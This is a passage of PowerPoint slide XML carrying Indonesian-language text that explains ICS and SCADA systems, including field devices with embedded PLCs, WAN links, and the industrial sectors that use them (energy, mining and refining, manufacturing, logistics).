              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> loop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Akuisisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Data (SCADA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengawasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuisisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data (SCADA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggantikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ICS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berskala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SCADA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dijalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengumpulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pabrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PLC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. SCADA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WAN, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satelit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server SCADA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> ICS / SCADA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sektor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Energi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembangkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>distribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>listrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> air / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>limbah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transportasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Industri </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertambangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemurnian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tungku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tekanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengepres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sentrifugal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pompa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagainya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Fabrikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>manufaktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merakitnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pabrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perakitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>presisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Logistik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>barang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembuatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perakitan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pabrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
